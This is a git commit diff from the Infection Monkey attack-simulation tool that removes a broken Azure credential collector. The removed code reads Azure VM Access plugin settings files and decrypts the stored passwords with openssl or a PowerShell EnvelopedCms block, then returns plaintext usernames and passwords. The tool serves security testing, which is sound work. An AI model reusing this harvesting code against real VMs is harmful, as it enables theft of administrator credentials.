Merge pull request #1590 from guardicore/1535-azure-collector-removal

1535 azure collector removal

.swm/OwcKMnALpn7tuBaJY1US.swm

@@ -97,7 +97,6 @@
             "lines": [
                 " from common.common_consts.system_info_collectors_names import (",
                 "     AWS_COLLECTOR,",
-                "     AZURE_CRED_COLLECTOR,",
                 "     ENVIRONMENT_COLLECTOR,",
                 "*    HOSTNAME_COLLECTOR,",
                 "     MIMIKATZ_COLLECTOR,",
@@ -116,8 +115,7 @@
                 "                         AWS_COLLECTOR,",
                 "*                        HOSTNAME_COLLECTOR,",
                 "                         PROCESS_LIST_COLLECTOR,",
-                "                         MIMIKATZ_COLLECTOR,",
-                "                         AZURE_CRED_COLLECTOR,"
+                "                         MIMIKATZ_COLLECTOR,"
             ]
         },
         {

CHANGELOG.md

@@ -24,6 +24,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
 - Remove serialization of config. #1537
 - Checkbox that gave the option to not try to first move the dropper file. #1537
 - Custom singleton mutex name config option. #1589
+- Azure credential collector, because it was broken (not gathering credentials). #1535
 
 ### Fixed
 - A bug in network map page that caused delay of telemetry log loading. #1545

monkey/common/common_consts/system_info_collectors_names.py

@@ -3,4 +3,3 @@ HOSTNAME_COLLECTOR = "HostnameCollector"
 ENVIRONMENT_COLLECTOR = "EnvironmentCollector"
 PROCESS_LIST_COLLECTOR = "ProcessListCollector"
 MIMIKATZ_COLLECTOR = "MimikatzCollector"
-AZURE_CRED_COLLECTOR = "AzureCollector"

monkey/infection_monkey/example.conf

@@ -11,7 +11,6 @@
   "current_server": "192.0.2.0:5000",
   "alive": true,
   "collect_system_info": true,
-  "extract_azure_creds": true,
   "should_use_mimikatz": true,
   "depth": 2,
 

monkey/infection_monkey/system_info/__init__.py

@@ -4,9 +4,7 @@ from enum import IntEnum
 
 import psutil
 
-from common.common_consts.system_info_collectors_names import AZURE_CRED_COLLECTOR
 from infection_monkey.network.info import get_host_subnets
-from infection_monkey.system_info.azure_cred_collector import AzureCollector
 from infection_monkey.system_info.system_info_collectors_handler import SystemInfoCollectorsHandler
 
 logger = logging.getLogger(__name__)
@@ -63,7 +61,6 @@ class InfoCollector(object):
     def get_info(self):
         # Collect all hardcoded
         self.get_network_info()
-        self.get_azure_info()
 
         # Collect all plugins
         SystemInfoCollectorsHandler().execute_all_configured()
@@ -77,35 +74,3 @@ class InfoCollector(object):
         """
         logger.debug("Reading subnets")
         self.info["network_info"] = {"networks": get_host_subnets()}
-
-    def get_azure_info(self):
-        """
-        Adds credentials possibly stolen from an Azure VM instance (if we're on one)
-        Updates the credentials structure, creating it if necessary (compat with mimikatz)
-        :return: None. Updates class information
-        """
-        # noinspection PyBroadException
-        try:
-            from infection_monkey.config import WormConfiguration
-
-            if AZURE_CRED_COLLECTOR not in WormConfiguration.system_info_collector_classes:
-                return
-            logger.debug("Harvesting creds if on an Azure machine")
-            azure_collector = AzureCollector()
-            azure_creds = azure_collector.extract_stored_credentials()
-            for cred in azure_creds:
-                username = cred[0]
-                password = cred[1]
-                if username not in self.info["credentials"]:
-                    self.info["credentials"][username] = {}
-                # we might be losing passwords in case of multiple reset attempts on same username
-                # or in case another collector already filled in a password for this user
-                self.info["credentials"][username]["password"] = password
-                self.info["credentials"][username]["username"] = username
-            if len(azure_creds) != 0:
-                self.info["Azure"] = {}
-                self.info["Azure"]["usernames"] = [cred[0] for cred in azure_creds]
-        except Exception:
-            # If we failed to collect azure info, no reason to fail all the collection. Log and
-            # continue.
-            logger.error("Failed collecting Azure info.", exc_info=True)

monkey/infection_monkey/system_info/azure_cred_collector.py

@@ -1,131 +0,0 @@
-import glob
-import json
-import logging
-import os.path
-import subprocess
-import sys
-
-from common.utils.attack_utils import ScanStatus
-from infection_monkey.telemetry.attack.t1005_telem import T1005Telem
-from infection_monkey.telemetry.attack.t1064_telem import T1064Telem
-
-logger = logging.getLogger(__name__)
-
-
-class AzureCollector(object):
-    """
-    Extract credentials possibly saved on Azure VM instances by the VM Access plugin
-    """
-
-    def __init__(self):
-        if sys.platform.startswith("win"):
-            self.path = (
-                "C:\\Packages\\Plugins\\Microsoft.Compute.VmAccessAgent\\2.4.2\\RuntimeSettings"
-            )
-            self.extractor = AzureCollector.get_pass_windows
-        else:
-            self.path = "/var/lib/waagent/Microsoft.OSTCExtensions.VMAccessForLinux-1.4.7.1/config"
-            self.extractor = AzureCollector.get_pass_linux
-        self.file_list = glob.iglob(os.path.join(self.path, "*.settings"))
-
-    def extract_stored_credentials(self):
-        """
-        Returns a list of username/password pairs saved under configuration files
-        :return: List of (user/pass), possibly empty
-        """
-        results = [self.extractor(filepath) for filepath in self.file_list]
-        results = [x for x in results if x]
-        logger.info("Found %d Azure VM access configuration file", len(results))
-        return results
-
-    @staticmethod
-    def get_pass_linux(filepath):
-        """
-        Extract passwords from Linux azure VM Access files
-        :return: Username, password
-        """
-        linux_cert_store = "/var/lib/waagent/"
-        try:
-            json_data = json.load(open(filepath, "r"))
-            # this is liable to change but seems to be stable over the last year
-            protected_data = json_data["runtimeSettings"][0]["handlerSettings"]["protectedSettings"]
-            cert_thumbprint = json_data["runtimeSettings"][0]["handlerSettings"][
-                "protectedSettingsCertThumbprint"
-            ]
-            base64_command = """openssl base64 -d -a"""
-            priv_path = os.path.join(linux_cert_store, "%s.prv" % cert_thumbprint)
-            b64_proc = subprocess.Popen(
-                base64_command.split(), stdin=subprocess.PIPE, stdout=subprocess.PIPE
-            )
-            b64_result = b64_proc.communicate(input=protected_data + "\n")[0]
-            decrypt_command = "openssl smime -inform DER -decrypt -inkey %s" % priv_path
-            decrypt_proc = subprocess.Popen(
-                decrypt_command.split(), stdout=subprocess.PIPE, stdin=subprocess.PIPE
-            )
-            decrypt_raw = decrypt_proc.communicate(input=b64_result)[0]
-            decrypt_data = json.loads(decrypt_raw)
-            T1005Telem(ScanStatus.USED, "Azure credentials", "Path: %s" % filepath).send()
-            T1064Telem(ScanStatus.USED, "Bash scripts used to extract azure credentials.").send()
-            return decrypt_data["username"], decrypt_data["password"]
-        except IOError:
-            logger.warning("Failed to parse VM Access plugin file. Could not open file")
-            return None
-        except (KeyError, ValueError):
-            logger.warning("Failed to parse VM Access plugin file. Invalid format")
-            return None
-        except subprocess.CalledProcessError:
-            logger.warning(
-                "Failed to decrypt VM Access plugin file. Failed to decode B64 and decrypt data"
-            )
-            return None
-
-    @staticmethod
-    def get_pass_windows(filepath):
-        """
-        Extract passwords from Windows azure VM Access files
-        :return: Username,password
-        """
-        try:
-            json_data = json.load(open(filepath, "r"))
-            # this is liable to change but seems to be stable over the last year
-            protected_data = json_data["runtimeSettings"][0]["handlerSettings"]["protectedSettings"]
-            username = json_data["runtimeSettings"][0]["handlerSettings"]["publicSettings"][
-                "UserName"
-            ]
-            # we're going to do as much of this in PS as we can.
-            ps_block = ";\n".join(
-                [
-                    '[System.Reflection.Assembly]::LoadWithPartialName("System.Security") | '
-                    "Out-Null",
-                    '$base64 = "%s"' % protected_data,
-                    "$content = [Convert]::FromBase64String($base64)",
-                    "$env = New-Object Security.Cryptography.Pkcs.EnvelopedCms",
-                    "$env.Decode($content)",
-                    "$env.Decrypt()",
-                    "$utf8content = [text.encoding]::UTF8.getstring($env.ContentInfo.Content)",
-                    "Write-Host $utf8content",  # we want to simplify parsing
-                ]
-            )
-            ps_proc = subprocess.Popen(
-                ["powershell.exe", "-NoLogo"], stdin=subprocess.PIPE, stdout=subprocess.PIPE
-            )
-            ps_out = ps_proc.communicate(ps_block)[0]
-            # this is disgusting but the alternative is writing the file to disk...
-            password_raw = ps_out.split("\n")[-2].split(">")[1].split("$utf8content")[1]
-            password = json.loads(password_raw)["Password"]
-            T1005Telem(ScanStatus.USED, "Azure credentials", "Path: %s" % filepath).send()
-            T1064Telem(
-                ScanStatus.USED, "Powershell scripts used to extract azure credentials."
-            ).send()
-            return username, password
-        except IOError:
-            logger.warning("Failed to parse VM Access plugin file. Could not open file")
-            return None
-        except (KeyError, ValueError, IndexError):
-            logger.warning("Failed to parse VM Access plugin file. Invalid format")
-            return None
-        except subprocess.CalledProcessError:
-            logger.warning(
-                "Failed to decrypt VM Access plugin file. Failed to decode B64 and decrypt data"
-            )
-            return None

monkey/monkey_island/cc/services/config_schema/config_schema_per_attack_technique.py

@@ -14,7 +14,6 @@ class ConfigSchemaPerAttackTechnique:
                     "T1003": {
                         "System Info Collectors": [
                             "Mimikatz collector",
-                            "Azure credential collector"
                         ]
                     }
                 }

monkey/monkey_island/cc/services/config_schema/definitions/system_info_collector_classes.py

@@ -1,6 +1,5 @@
 from common.common_consts.system_info_collectors_names import (
     AWS_COLLECTOR,
-    AZURE_CRED_COLLECTOR,
     ENVIRONMENT_COLLECTOR,
     HOSTNAME_COLLECTOR,
     MIMIKATZ_COLLECTOR,
@@ -53,13 +52,5 @@ SYSTEM_INFO_COLLECTOR_CLASSES = {
             "info": "Collects a list of running processes on the machine.",
             "attack_techniques": ["T1082"],
         },
-        {
-            "type": "string",
-            "enum": [AZURE_CRED_COLLECTOR],
-            "title": "Azure Credential Collector",
-            "safe": True,
-            "info": "Collects password credentials from Azure VMs",
-            "attack_techniques": ["T1003", "T1005"],
-        },
     ],
 }

monkey/monkey_island/cc/services/config_schema/monkey.py

@@ -1,6 +1,5 @@
 from common.common_consts.system_info_collectors_names import (
     AWS_COLLECTOR,
-    AZURE_CRED_COLLECTOR,
     ENVIRONMENT_COLLECTOR,
     HOSTNAME_COLLECTOR,
     MIMIKATZ_COLLECTOR,
@@ -94,7 +93,6 @@ MONKEY = {
                         HOSTNAME_COLLECTOR,
                         PROCESS_LIST_COLLECTOR,
                         MIMIKATZ_COLLECTOR,
-                        AZURE_CRED_COLLECTOR,
                     ],
                 },
             },

monkey/monkey_island/cc/services/reporting/aws_exporter.py

@@ -86,7 +86,6 @@ class AWSExporter(Exporter):
             ExploiterDescriptorEnum.STRUTS2.value.class_name: AWSExporter._handle_struts2_issue,
             ExploiterDescriptorEnum.WEBLOGIC.value.class_name: AWSExporter._handle_weblogic_issue,
             ExploiterDescriptorEnum.HADOOP.value.class_name: AWSExporter._handle_hadoop_issue,
-            # azure and conficker are not relevant issues for an AWS env
         }
 
         configured_product_arn = INFECTION_MONKEY_ARN

monkey/monkey_island/cc/services/reporting/report.py

@@ -97,24 +97,6 @@ class ReportService:
             for tunnel in mongo.db.monkey.find({"tunnel": {"$exists": True}}, {"tunnel": 1})
         ]
 
-    @staticmethod
-    def get_azure_issues():
-        creds = ReportService.get_azure_creds()
-        machines = set([instance["origin"] for instance in creds])
-
-        logger.info("Azure issues generated for reporting")
-
-        return [
-            {
-                "type": "azure_password",
-                "machine": machine,
-                "users": set(
-                    [instance["username"] for instance in creds if instance["origin"] == machine]
-                ),
-            }
-            for machine in machines
-        ]
-
     @staticmethod
     def get_scanned():
         formatted_nodes = []
@@ -249,30 +231,6 @@ class ReportService:
                 creds.extend(ssh_keys)
         return creds
 
-    @staticmethod
-    def get_azure_creds():
-        """
-        Recover all credentials marked as being from an Azure machine
-        :return: List of credentials.
-        """
-        creds = []
-        for telem in mongo.db.telemetry.find(
-            {"telem_category": "system_info", "data.Azure": {"$exists": True}},
-            {"data.Azure": 1, "monkey_guid": 1},
-        ):
-            azure_users = telem["data"]["Azure"]["usernames"]
-            if len(azure_users) == 0:
-                continue
-            origin = NodeService.get_monkey_by_guid(telem["monkey_guid"])["hostname"]
-            azure_leaked_users = [
-                {"username": user.replace(",", "."), "type": "Clear Password", "origin": origin}
-                for user in azure_users
-            ]
-            creds.extend(azure_leaked_users)
-
-        logger.info("Azure machines creds generated for reporting")
-        return creds
-
     @staticmethod
     def process_exploit(exploit) -> ExploiterReportInfo:
         exploiter_type = exploit["data"]["exploiter"]
@@ -628,7 +586,6 @@ class ReportService:
                 "scanned": scanned_nodes,
                 "exploited_cnt": exploited_cnt,
                 "stolen_creds": ReportService.get_stolen_creds(),
-                "azure_passwords": ReportService.get_azure_creds(),
                 "ssh_keys": ReportService.get_ssh_keys(),
                 "strong_users": PTHReportService.get_strong_users_on_crit_details(),
             },
@@ -645,7 +602,6 @@ class ReportService:
             ReportService.get_exploits,
             ReportService.get_tunnels,
             ReportService.get_island_cross_segment_issues,
-            ReportService.get_azure_issues,
             PTHReportService.get_duplicated_passwords_issues,
             PTHReportService.get_strong_users_on_crit_issues,
         ]

monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js

@@ -43,7 +43,6 @@ import {
 import {tunnelIssueReport, tunnelIssueOverview} from './security/issues/TunnelIssue';
 import {stolenCredsIssueOverview} from './security/issues/StolenCredsIssue';
 import {weakPasswordIssueOverview} from './security/issues/WeakPasswordIssue';
-import {azurePasswordIssueOverview, azurePasswordIssueReport} from './security/issues/AzurePasswordIssue';
 import {strongUsersOnCritIssueReport} from './security/issues/StrongUsersOnCritIssue';
 import {
   zerologonIssueOverview,
@@ -177,11 +176,6 @@ class ReportPageComponent extends AuthComponent {
         [this.issueContentTypes.REPORT]: strongUsersOnCritIssueReport,
         [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
       },
-      'azure_password': {
-        [this.issueContentTypes.OVERVIEW]: azurePasswordIssueOverview,
-        [this.issueContentTypes.REPORT]: azurePasswordIssueReport,
-        [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
-      },
       'weak_password': {
         [this.issueContentTypes.OVERVIEW]: weakPasswordIssueOverview,
         [this.issueContentTypes.TYPE]: this.issueTypes.DANGER

monkey/monkey_island/cc/ui/src/components/report-components/security/issues/AzurePasswordIssue.js

@@ -1,23 +0,0 @@
-import React from 'react';
-import CollapsibleWellComponent from '../CollapsibleWell';
-
-export function azurePasswordIssueOverview() {
-  return (<li>Azure machines expose plaintext passwords. (<a
-                      href="https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/"
-                    >More info</a>)</li>)
-}
-
-export function azurePasswordIssueReport(issue) {
-  return (
-      <>
-        Delete VM Access plugin configuration files.
-        <CollapsibleWellComponent>
-          Credentials could be stolen from <span
-          className="badge badge-primary">{issue.machine}</span> for the following users <span
-          className="badge badge-primary">{issue.users}</span>. Read more about the security issue and remediation <a
-          href="https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/"
-        >here</a>.
-        </CollapsibleWellComponent>
-      </>
-    );
-}

monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json

@@ -162,8 +162,7 @@
           "awscollector",
           "hostnamecollector",
           "processlistcollector",
-          "mimikatzcollector",
-          "azurecollector"
+          "mimikatzcollector"
         ]
       },
       "persistent_scanning": {